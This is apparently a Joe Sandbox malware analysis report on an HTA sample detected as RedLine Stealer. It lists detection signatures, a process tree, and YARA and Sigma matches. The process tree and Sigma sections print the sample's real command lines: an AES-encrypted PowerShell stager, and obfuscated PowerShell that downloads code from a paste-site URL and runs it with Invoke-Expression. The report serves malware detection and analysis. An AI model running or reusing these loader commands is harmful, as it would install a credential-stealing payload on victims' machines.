Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payload_1.hta

Overview

General Information

Sample name:payload_1.hta
Analysis ID:1576532
MD5:c95acf240ea0e5ab9ccc52d1bf50ff80
SHA1:0c01a3638dad2f5e2cf9b9932f72b7f731f1c6c0
SHA256:71e590840310d7eab4d8c339a094847523d368777cfda93fde87e0b25d9051f3
Tags:docu-signer-comhtauser-JAMESWT_MHT
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7452 cmdline: mshta.exe "C:\Users\user\Desktop\payload_1.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75720F63DAC402F92D531741366BDB6322CF081331A805D7C393B10FE6A6618BA7FCC4E44DC5C3A47A515A78FD0681299AE510D773C4AE75FA31612D3D761D8F51CB984EE9FE20883C2574541CB70B38F08EBC3023844993DE3B2CEAA99C7009E715AEA59A5FD63088DABF3232B33A46C35A72875E7544BE0C19F8CB92CF266FDFA7ADB7450BB6B1BB5764CACC8A0D627027BDE338F15A2F8ECC5EBF9EE1C3D0F79E37CC3411BDB4D526BA177D7FF4D1ED20E9894CC6E2648DC8FC2D093F6902B74DB4734ED06D43D0FB6A059279B864CFB87D4BB1DEBA3231227EB853545F0719A82018CCF19D9DC57F3A1C53666C941C5B457CA531546D3B800353A592D337CEEBED25824ED14F551081B08B6BA4A2059BAB42CC76D64E04A6DA0B3F10A753DF0A78DF9ED54DF3ADA3FB5B2265878E42BD705E435684134A35F96363B352F4BC04C266C99E75BED507D7C90A66E95C9D579520DB850EBCA134E512948BA775D035F895CB164ECF18DE81BE0FB9A6FB1FE1420F36FEDE040D9AB9343D928AD528763A51983374934ECD28DFB3D1957EFD625A9446717760CC7DC939BF26E555C8F22289F0DBC19789B4959F856A76B0EB6B71198B98EAE2103527702F776A6E63EDC34DA4615FB6324C083EBA43C9F3D9194E7F3EB6E3690044935E9E945A043E06339A90CD5C082951401D1A63BA39BF680652F8989BF4CD69559249DC7898F06521B5D07DBF12FFD6CF71EFA8681D6FDAEDAD1262BED7933FACC9C1B8DE78D5DAB90DD2018854BA9AF7F4BD8927EC8B7F9C0774803B76F3B90447B63425D5B07CC834F49BD8D5DD26240C7A0953A10862584B0F1E4827E3C946EFF41E8284A4E4978A44245F4D8379F5A8105821871172D50BA89834B46C518229D1E0F0E4E77');$nJpn=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CgMQB('484650636D48754D45634B49746F565A')),[byte[]]::new(16)).TransformFinalBlock($QBRr,0,$QBRr.Length)); & $nJpn.Substring(0,3) $nJpn.Substring(273) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • updater.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • MSBuild.exe (PID: 5888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • Acrobat.exe (PID: 8052 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 1996 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3528 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • AutoIt3.exe (PID: 3148 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • MSBuild.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 1728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • AutoIt3.exe (PID: 1296 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • MSBuild.exe (PID: 4660 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.1758635983.0000000004A70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000003.1897385765.00000000054F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000014.00000002.1898870666.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.3.AutoIt3.exe.54c5d6c.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              16.3.AutoIt3.exe.54c5d6c.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                16.3.AutoIt3.exe.54c5d6c.0.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                • 0xb9042:$s14: keybd_event
                • 0xbfbb1:$v1_1: grabber@
                • 0xb9c14:$v1_2: <BrowserProfile>k__
                • 0xba68d:$v1_3: <SystemHardwares>k__
                • 0xba74c:$v1_5: <ScannedWallets>k__
                • 0xba7dc:$v1_6: <DicrFiles>k__
                • 0xba7b8:$v1_7: <MessageClientFiles>k__
                • 0xbab82:$v1_8: <ScanBrowsers>k__BackingField
                • 0xbabd4:$v1_8: <ScanWallets>k__BackingField
                • 0xbabf1:$v1_8: <ScanScreen>k__BackingField
                • 0xbac2b:$v1_8: <ScanVPN>k__BackingField
                • 0xac45a:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                • 0xabd66:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                21.2.AutoIt3.exe.44b6e70.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  21.2.AutoIt3.exe.44b6e70.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 19 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi32_7608.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                    • 0xb6a2:$b1: ::WriteAllBytes(
                    • 0x10ba:$s1: -join
                    • 0xae15:$s1: -join
                    • 0xb757:$s1: -join
                    • 0x45c1:$s4: +=
                    • 0x4683:$s4: +=
                    • 0x88aa:$s4: +=
                    • 0xa9c7:$s4: +=
                    • 0xacb1:$s4: +=
                    • 0xadf7:$s4: +=
                    • 0xd712:$s4: +=
                    • 0xd792:$s4: +=
                    • 0xd858:$s4: +=
                    • 0xd8d8:$s4: +=
                    • 0xdaae:$s4: +=
                    • 0xdb32:$s4: +=
                    • 0xb180:$e4: Start-Process
                    • 0xbbdd:$e4: Get-WmiObject
                    • 0xbdcc:$e4: Get-Process
                    • 0xbe24:$e4: Start-Process

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240F